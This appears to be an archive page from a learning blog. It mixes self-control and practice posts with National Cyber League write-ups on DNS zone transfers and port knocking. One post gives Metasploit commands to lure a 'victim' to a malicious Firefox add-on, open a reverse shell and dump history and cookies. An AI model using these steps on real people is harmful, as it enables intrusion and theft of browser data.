Archive | Learning RSS feed for this section

The Marshmallow Test

Walter Mischel has written a book about the test, its findings, and learning greater self-control: The Marshmallow Test: Mastering Self-Control.

The world’s leading expert on self-control, Walter Mischel has proven that the ability to delay gratification is critical for a successful life, predicting higher SAT scores, better social and cognitive functioning, a healthier lifestyle and a greater sense of self-worth. But is willpower prewired, or can it be taught?

In The Marshmallow Test, Mischel explains how self-control can be mastered and applied to challenges in everyday life — from weight control to quitting smoking, overcoming heartbreak, making major decisions, and planning for retirement. With profound implications for the choices we make in parenting, education, public policy and self-care, The Marshmallow Test will change the way you think about who we are and what we can be.

Leave a Comment

November 16, 2014 0 Comments

DNS Enumeration for National Cyber League (NCL) Regular Season Game 2

A zone transfer in DNS is a normal occurrence, but when this information falls into the wrong hands the effect can be devastating. A zone transfer is designed to update DNS servers with the correct information; however, the zone contains information that could map out the network, providing valuable data about the structure of the environment.

digAXFR-DNS-Zone-transfer
The screenshot above shows the dig command to contact the name server on 54.243.174.22, asking for information about a domain called “flag.ncl” and there is also a zone transfer being invoked with “-t AXFR”. As you can see from the output there is a good deal of information about potential target systems in the flag.ncl domain.

dig @54.243.174.22 flag.ncl -t AXFR
; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> @54.243.174.22 flag.ncl -t AXFR
; (1 server found)
;; global options: +cmd
flag.ncl.		604800	IN	SOA	ncl. flag.ncl. 2 604800 86400 2419200 604800
flag.ncl.		604800	IN	NS	flag.ncl.
flag.ncl.		604800	IN	A	127.12.34.56
admin.flag.ncl.		604800	IN	A	127.44.65.92
secret.flag.ncl.	604800	IN	A	127.1.0.1
termserv.flag.ncl.	604800	IN	A	127.79.255.255
welcome.flag.ncl.	604800	IN	A	127.2.114.31
zeus.flag.ncl.		604800	IN	A	127.212.83.111
flag.ncl.		604800	IN	SOA	ncl. flag.ncl. 2 604800 86400 2419200 604800
;; Query time: 46 msec
;; SERVER: 54.243.174.22#53(54.243.174.22)
;; WHEN: Mon Nov  3 15:05:09 2014
;; XFR size: 9 records (messages 1, bytes 243)

 

Question and Answers for (Enum 2) Enumeration and Exploitation:

What is the IP Address for the domain: “flag.ncl”?
127.12.34.56

What is the domain name with the IP Address of 127.44.65.92 (FQDN)?
admin.flag.ncl

What is the domain name with the IP Address of 127.212.83.111 (FQDN)?
zeus.flag.ncl

What is the domain name with the IP Address of 127.2.114.31 (FQDN)?
welcome.flag.ncl

What is the domain name with the IP Address of 127.79.255.255 (FQDN)?
termserv.flag.ncl

What is the domain name with the IP Address of 127.1.0.1 (FQDN)?
secret.flag.ncl

 

Common DNS Record Types and Their Use:

A (address)
Maps a host name to an IP address

SOA (Start of Authority)
Identifies the DNS server responsible for the domain information

CNAME (canonical name)
Provides additional names or aliases for the address record

MX (mail exchange)
Identifies the mail server for the domain

SRV (service)
Identifies services such as directory services

PTR (pointer)
Maps IP addresses to host names

NS (name server)
Identifies other name servers for the domain

 

Leave a Comment

November 4, 2014 0 Comments ,

Video

How to Get History and Cookies from Mozilla Firefox with Metasploit

Send the link of the server to the victim via chat, email or other social engineering technique. Once you have access to the victims PC; simply run post module to dump credentials.

msfconsole
use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set uripath /
exploit

How to Collect History

use post/firefox/gather/history
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set session 1
exploit
loot

How to Collect Cookies

use post/firefox/gather/cookies
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set session 1
exploit
loot

November 3, 2014 0 Comments ,

Deliberate Practice

Are you working toward your ‘10 years of silence‘ today? Are you deliberately focused on developing your skills? Or are you simply “putting in your time” and hoping for the best?

You can take the same approach to your work, to your goals, and to your legacy. By combining these two ideas — the consistency of “10 years of silence” and the focus of “deliberate practice” — you can blow past most people.

Leave a Comment

November 1, 2014 0 Comments

Video

Port Knocking with Knockd and Knock for National Cyber League (NCL)

From Wikipedia “In computer networking, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received, the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specific port(s).”[1]

Install the Knockd Service and Client

sudo apt-get install knockd

A challenge may include using knock client and the default knockd sequence to open a new port(s). It is recommended that you scan the client namp -sV -p- -T5 [ipaddress]. This will show the current open port(s) and service/version information. Try the knocked default sequence knock -v [ipaddress] 7000 8000 9000.

There will be no immediate indication that a port has opened after knocking, as you will have to re-scan and compare to find the new open port. More than likely there is a time limit on how long the new port will stay open and available for access.

PROTIP: You may have to use “wget” to extract the flag. The command wget --no-check-certficate https://webaddress:port might extract the page hosted on the open port.

KnockdEfault Evaluator v1.1 – knock-knock

The two tools in this package are knockdefault.py and knockd_on-off.py. The first of these is a scanner to identify default configs and the latter is a utility to interact with identified vulnerable services.[2]

root@kali:~# git clone https://github.com/hack1thu7ch/knock-knock.git
root@kali:~# cd knock-knock/
root@kali:~# ./setup.sh
root@kali:~# ./knockdefault.py

 

Web Citations:
[1] http://en.wikipedia.org/wiki/Port_knocking
[2] http://www.shortbus.ninja/default-knockd-cloaking-configurations/

October 31, 2014 0 Comments , , ,

Newer Entries
Older Entries